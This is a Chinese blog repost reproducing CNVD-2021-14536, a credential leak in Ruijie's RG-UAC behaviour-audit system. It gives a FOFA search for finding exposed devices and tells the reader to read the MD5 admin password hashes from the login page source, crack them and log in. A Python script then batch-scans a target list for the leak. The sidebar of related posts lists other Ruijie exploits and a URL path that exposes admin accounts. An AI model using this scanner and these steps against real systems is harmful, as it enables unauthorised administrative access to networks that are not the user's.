锐捷RG-UAC统一上网行为管理审计系统账号密码 CNVD-2021-14536信息泄露漏洞

最新推荐文章于 2024-06-21 17:45:52 发布
最新推荐文章于 2024-06-21 17:45:52 发布
阅读量721 收藏
点赞数
分类专栏: 笔记 文章标签: 安全
原文链接:http://wiki.peiqi.tech/
版权

文章目录

一、漏洞描述:

锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台。

二、影响版本:

锐捷RG-UAC统一上网行为管理审计系统

三、漏洞复现:

FOFA语句:title="RG-UAC登录页面"

来到登录页面:
在这里插入图片描述按F12查看源码,可以发现账号和密码的md5形式,解密md5得到密码后即可登录系统:

在这里插入图片描述

四、漏洞POC:

# -*- coding: utf-8 -*-
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
    print('+  \033[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统                             \033[0m')
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
    print('+  \033[36mFile         >>> ip.txt                             \033[0m')
    print('+------------------------------------------')

def POC_1(target_url):
    vuln_url = target_url
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        if "super_admin" in response.text and "password" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 \033[0m".format(target_url))
        else:
            print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
    except Exception as e:
        print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))


def Scan(file_name):
    with open(file_name, "r", encoding='utf8') as scan_url:
        for url in scan_url:
            if url[:4] != "http":
                url = "http://" + url
            url = url.strip('\n')
            try:
                POC_1(url)

            except Exception as e:
                print("\033[31m[x] 请求报错 \033[0m".format(e))
                continue


if __name__ == '__main__':
    title()
    file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m"))
    Scan(file_name)

在这里插入图片描述

内蒙古打野
关注
专栏目录
锐捷RG-UAC统一上网行为管理审计系统信息泄漏漏洞
xiaokp7的博客
09-13 412
锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台。
锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露
千寻的博客
04-24 1210
文章目录漏洞名称漏洞编号漏洞描述影响版本FOFA漏洞复现一(poc)漏洞复现二第一步 登录页面第二步 按F12查看源码,可以发现账号和密码的md5形式第三步解密md5得到密码第四步 登录系统摘抄 漏洞名称 锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露 漏洞编号 CNVD-2021-14536 漏洞描述 锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露, 可以间接获取用户账号密码信息登录后台 影响版本 锐捷RG-UAC统一上网行为管理审计系统 FOFA title
锐捷统一上网行为管理审计系统 static_convert.php 前台RCE漏洞复现
最新发布
0xSec
06-21 1435
锐捷统一上网行为管理审计系统 static_convert.php 接口存在远程命令执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁。
漏洞复现】锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)
Adminxe的博客
03-09 3630
0x00 前言 2021年3月8日,锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞,攻击者可以通过审查网页源代码获取到用户账号和密码,导致管理员用户认证信息泄露。 这个漏洞让我想到10年的审查元素大法,确实逻辑有点…… 0x01 影响范围 锐捷RG-UAC统一上网行为管理审计系统 FOFA互联网资产: title="RG-UAC登录页面" 0x02 漏洞复现 Ctrl+U打开网页源代码 通过访问一下路径,查看所包含的账户密码的(md5)形式 http://127..
锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞CNVD-2021-14536)复现
qq_46085232的博客
03-11 1029
锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞CNVD-2021-14536)复现 0X01 漏洞描述 锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 0X02 漏洞影响 锐捷RG-UAC统一上网行为管理审计系统 0X03 漏洞复现 FOFA语句:title=“RG-UAC登录页面”,(发现还是使用该系统的还是挺多的)。 打开某个“中招的小伙伴” 查看页面源代码,发现有三个账号,密码一看就是MD5解密值 MD5解密一波(https://www
锐捷RG-UAC敏感信息泄露
qq_44877321的博客
02-14 249
锐捷漏洞复现
锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞 CNVD-2021-14536
WgpSec狼组安全团队
03-08 1486
声明 本文作者:PeiQi 本文字数:1030 阅读时长:5~6分钟 附件/链接:点击查看原文下载 本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。 狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 ..
漏洞复现】锐捷RG-UAC统一上网行为管理系统信息泄露漏洞
晚风不及你
01-08 856
锐捷网络成立于2000年1月,原名实达网络,2003年更名,自成立以来,一直扎根行业,深入场景进行解决方案设计和创新,并利用云计算、SDN、移动互联、大数据、物联网、AI等新技术为各行业用户提供场景化的数字解决方案,助力全行业数字化转型升级。
CNVD-2021-17369 -- 锐捷Smartweb管理系统 密码信息泄露漏洞
DUANYU23的博客
04-05 3195
锐捷Smartweb管理系统 密码信息泄露漏洞0X001前言0X002 漏洞影响0X003 漏洞原理0X004 漏洞复现0X041 空间搜索寻找目标0X042尝试弱口令登陆0X043查看数据发生的请求文件0X005 POC0X006 修复建议 0X001前言 锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。 0X002 漏洞影响 获取锐捷Smartweb管理系统权限。 0X003 漏洞原理 通过弱口令进入控制台,数据后发现请求了一个
CNVD-2021-14536 锐捷 RG-UAC 统一上网行为管理审计系统信息泄露漏洞
weixin_51706044的博客
09-28 345
就很离谱,再看信息泄露的东西的时候,看到一篇漏洞复现的文章。。。。 管理员密码就在源代码里面,让我们来看看 复现环境 fofa搜索 title="RG-UAC登录页面" && body="admin" 选择一个进入环境 直接进入后台查看源代码???? 可以看到,管理员的账号密码都有,不过密码进行了md5加密,接出来不就好了吗这里 进行登录。。就这样进来了 参考链接:大大佬的博客 ...
EgGateWayGetShell:锐捷EG易网关批量GetShell Code By
05-29
例子: java -jar EGGatewayGetShell.jar RPC 网络外壳:
锐捷RG-UAC同一上网行为管理(信息泄露漏洞复现)
weixin_45291045的博客
03-13 1765
构造url https://xxx.xxx.cn/get_dkey.php?user=admin 可看到该系统的超级管理员权限账号、访客权限账号 md5解密密码后即可登录
锐捷RG-UAC统一上网行为管理审计系统管理员密码泄露
weixin_62352348的博客
01-17 458
锐捷RG-UAC统一上网行为管理审计系统管理员密码泄露
华三光纤交换机默认密码和重置方法
weixin_44369454的博客
08-05 1万+
默认用户名 admin: 默认密码 password 重置密码方法如下 将管理机连接至光纤交换机串口,波特率为9600。 串口登录至光纤交换机 光纤交换机前端可见左右各有电源开关,关机、开机,以重启光纤交换机。 光纤交换机启动后,出现“ Hit ESC to stop autoboot : 5”时,在5秒之内按ESC键,中断启动过程,进入启动接口模式。 选择3,进入Command Shell。 如先前未设置过boot PROM password,则此处会提示“Boot PROM password ha
漏洞复现】锐捷EG易网关cli.php后台命令执行漏洞
晚风不及你
01-09 1169
锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。
CVE-2023-3450 锐捷Ruijie路由器命令执行漏洞复现
08-07 2983
RG-BCR860是锐捷网络推出的一款商业云路由器,它是专为酒店、餐饮、门店设计,适用带宽100Mbps,带机量可达150台,支持Sec VPM、内置安全审计模块,给商家带来更好的网络营销体验。该产品主支持全中文的WEB 界面配置,不再需要用传统的命令行进行配置,使得设备更加简单方便的进行维护和管理。
锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞(CNVD-2021-09650)——漏洞复现
2301_76437855的博客
06-11 618
锐捷网络股份有限公司是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。公开日期:2021-09-19漏洞编号:CNVD-2021-09650危害等级:高危漏洞描述:锐捷NBR路由器存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
锐捷 Smartweb管理系统 命令执行漏洞
热门推荐
LiBai'S BLOG
11-01 2万+
锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷Smartweb系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
锐捷RG-UAC6000系列:高性能上网行为管理审计白皮书
RG-UAC6000系列统一上网行为管理审计产品白皮书详细介绍了锐捷网络推出的业界领先的产品,旨在为各类组织提供全面的网络行为管理和审计解决方案。该产品集成了高性能处理能力,支持高达40Gbps的网络吞吐量和20Gbps...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值